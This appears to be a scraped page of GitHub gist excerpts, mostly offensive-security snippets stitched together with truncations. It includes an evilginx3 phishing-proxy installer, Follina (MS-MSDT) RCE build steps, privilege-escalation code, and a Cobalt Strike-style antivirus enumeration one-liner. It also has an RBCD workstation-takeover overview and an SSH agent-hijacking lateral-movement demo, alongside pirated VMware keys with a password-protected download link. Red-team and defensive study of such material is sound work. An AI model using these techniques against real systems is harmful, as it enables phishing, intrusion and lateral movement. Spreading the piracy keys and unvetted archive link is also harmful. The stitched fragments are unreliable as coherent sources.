@dunderhay
dunderhay / install_evilginx3.sh
Last active July 14, 2024 11:34
bash script to install evilginx3 on a ubuntu linux host
#!/bin/bash
set -e
GO_VERSION="1.22.3"
GO_URL="https://go.dev/dl/go${GO_VERSION}.linux-amd64.tar.gz"
EXPECTED_CHECKSUM="8920ea521bad8f6b7bc377b4824982e011c19af27df88a815e3586ea895f1b36"
# Log output of script
exec > >(tee -i /home/ubuntu/install.log)
exec 2>&1
@cablej
cablej / esxi_victims.csv
Last active June 9, 2023 02:42
A list of ESXi victims Censys, published by Ransomwhere
@PurpleVibe32
PurpleVibe32 / vmwk17key.txt
Last active July 22, 2024 05:57
Free VMware Workstation Pro 17 full license keys
Install VMWare Workstation PRO 17 (Read it right. PRO!)
Also, these keys might work with VMWare Fusion 13 PRO. Just tested it.
Sub to me on youtube pls - PurpleVibe32
if you want more keys - call my bot on telegram. @purector_bot (THE BOT WONT REPLY ANYMORE) - Or: https://cdn.discordapp.com/attachments/1040615179894935645/1074016373228978277/keys.zip - the password in the zip is 102me.
---
This gist can get off at any time.
PLEASE, DON'T COPY THIS. IF YOU FORK IT, DON'T EDIT IT.
*If you have a problem comment and people will try to help you!
*No virus
// TcbElevation - Authors: @splinter_code and @decoder_it
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#pragma comment(lib, "Secur32.lib")
void EnableTcbPrivilege(BOOL enforceCheck);
@tothi
tothi / ms-msdt.MD
Last active April 18, 2024 02:22
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
#!/usr/bin/env python3
import os
import caracara
import sys

# Authenticate to the Falcon API with credentials taken from the environment
hosts = caracara.HostsToolbox(
    key=os.environ["FALCON_CLIENT_ID"],
    secret=os.environ["FALCON_CLIENT_SECRET"],
    verbose=True,
)

# Read one hostname per line from the file given as the first argument
with open(sys.argv[1]) as doc:
    for _hostname in doc.readlines():
        # Resolve the hostname to its Falcon agent ID (AID)
        target_aid = hosts.host.find_host_aid(hostname=_hostname.strip())
@mttaggart
mttaggart / make-lnk.ps1
Last active September 23, 2023 20:15
make-lnk.ps1
param ( [string]$SourceExe, [string]$DestinationPath, [string]$IconPath)
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut($DestinationPath)
$Shortcut.RelativePath = "..\..\..\..\..\..\..\..\..\$SourceExe"
$Shortcut.IconLocation = $IconPath
$Shortcut.TargetPath = $SourceExe
$Shortcut.Save()
#AntiVirus Query
#Author: @r3dQu1nn
#Queries the Registry for AV installed
#Thanks to @i_am_excite and @merrillmatt011 for the help
#Props to @zerosum0x0 for the wmic find!
#Long ass one-liner :)
$powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE)
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active June 23, 2024 22:01
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished, in short, by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld